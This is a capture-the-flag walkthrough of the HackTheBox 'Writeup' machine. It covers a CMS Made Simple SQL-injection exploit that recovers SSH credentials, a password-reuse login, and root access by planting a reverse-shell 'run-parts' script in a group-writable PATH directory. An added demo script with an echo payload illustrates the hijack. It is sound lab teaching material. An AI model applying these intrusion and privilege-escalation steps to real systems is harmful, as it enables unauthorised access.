HackTheBox Writeup — Writeup
Hello guys, I am Faisal Husaini. My username on HTB is "faisalelino".
The IP of this box is 10.10.10.138.
NMAP Results
nmap -sC -sV -oN nmap-writeup 10.10.10.138
We see two open ports: port 22 running SSH and port 80 running HTTP.
Next we check the web service running on port 80.
Port 80 — HTTP Service
Browsing to the IP, we see:
Running gobuster against it does not work, as the site sits behind a WAF that blocks the scan.
The nmap scan shows a robots.txt file. Checking it, we get:
It disallows a /writeup directory, so let's try to access it.
We see a page about writeups.
Analyzing the page with Wappalyzer, we find:
The page uses CMS Made Simple (CMSMS), and searching for exploits for it turns up one for SQL injection (SQLi) (link at the end of this writeup).
Checking the usage of the exploit script , we see
So we need to specify the target URL with -u, tell the script to crack the recovered hash, and supply a wordlist.
We are set, so we run the script:
We get the username jkr and the password raykayjay9.
The script's documentation notes that CMSMS exposes its admin panel at /admin by default; in our case that is /writeup/admin.
It prompts for a username and password, so we enter the credentials recovered by the Python exploit script.
Hmmm! That does not work, but the nmap scan showed SSH open, so we try the same credentials there (password reuse between a web application and a system account is common enough to be worth a try).
We log in successfully as jkr over SSH. Let's get the user flag first.
The user flag is in jkr's home directory, where the SSH session lands. Now for privilege escalation.
Privilege Escalation
We run pspy on the box to watch which processes and cron jobs run.
Every time someone logs in over SSH, a command of the form "sh -c /usr/bin/env -i PATH=linuxpaths run-parts something" is run. Because env -i sets PATH explicitly and run-parts is invoked by bare name rather than by absolute path, the order of directories in that PATH decides which run-parts actually executes.
Checking the permissions of each directory in that PATH, we see that:
/usr/local/sbin is owned by group staff and is group-writable.
The id command shows that jkr is a member of the staff group, so we can create and edit files in /usr/local/sbin.
So we hijack the PATH. The real run-parts lives in /bin, which is the last entry in the PATH, while /usr/local/sbin is searched first.
If we drop our own run-parts into /usr/local/sbin, the next SSH login will execute it instead of the real one.
We create our run-parts script (a reverse shell) and make it executable. The writeup sets the mode to 777; 755 is enough, since all that matters is that the invoking process can execute it.
We can see that the file is created and the permissions are set.
Now we start a netcat listener and wait for the connection that our next SSH login will trigger.
We log in over SSH again from another terminal so that the login hook fires and sends us the shell.
Boom! We get the reverse shell, and the details are shown below.
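To show the PATH-hijack mechanics from the privilege-escalation steps above without needing the box, here is an added example (it is not code from the original writeup). It assumes a constructed PATH layout under a temporary directory in which the real run-parts sits in the last entry and a writable directory comes first, and it uses an echo in place of the reverse-shell payload; the command name run-parts and the directory names mirror the box, but the real PATH value from pspy is not reproduced here.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Assumptions: directory layout and PATH string are constructed for the demo;
# "echo hijacked" stands in for the reverse-shell one-liner used on the box.

# hijackable_dirs PATH CMD
# Prints every directory in PATH that the caller can write to and that is
# searched BEFORE the directory where CMD is actually found. Those are the
# places where a planted CMD would shadow the real one under env -i PATH=...
hijackable_dirs() {
    hd_path="$1"; hd_cmd="$2"
    hd_old_ifs="$IFS"; IFS=':'
    for hd_dir in $hd_path; do
        # First directory holding an executable CMD is the one that would run;
        # anything after it cannot be used for a hijack, so stop here.
        if [ -x "$hd_dir/$hd_cmd" ]; then break; fi
        [ -d "$hd_dir" ] && [ -w "$hd_dir" ] && printf '%s\n' "$hd_dir"
    done
    IFS="$hd_old_ifs"
}

# plant_stub DIR CMD PAYLOAD
# Drops an executable shell script named CMD into DIR that runs PAYLOAD.
plant_stub() {
    printf '#!/bin/sh\n%s\n' "$3" > "$1/$2"
    chmod 755 "$1/$2"
}

# demo_hijack
# Builds a throwaway PATH layout, plants a fake run-parts in the first writable
# directory, then triggers it the same way the login hook does
# (env -i PATH=... run-parts). Prints which copy ran: "real" or "hijacked".
demo_hijack() {
    base="$(mktemp -d)"
    mkdir -p "$base/usr/local/sbin" "$base/bin"
    # The "real" binary lives in the LAST PATH entry, as on the box.
    plant_stub "$base/bin" run-parts 'echo real'
    fake_path="$base/usr/local/sbin:$base/bin"
    # Pick the first writable directory searched ahead of the real binary.
    target="$(hijackable_dirs "$fake_path" run-parts | head -n 1)"
    # On the box this payload would be the reverse shell, not an echo.
    plant_stub "$target" run-parts 'echo hijacked'
    result="$(env -i PATH="$fake_path" run-parts)"
    rm -rf "$base"
    printf '%s\n' "$result"
}
```

On the box itself you would run hijackable_dirs with the exact PATH value shown by pspy and the command name run-parts; any directory it prints is a candidate for the planted script, and /usr/local/sbin is the one the writeup uses.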
Now we read the root flag, which is located at /root/root.txt.
This was really a fantastic box and I really enjoyed solving it. Thanks to jkr for creating this box. If you loved reading this writeup, please do leave 50 claps :)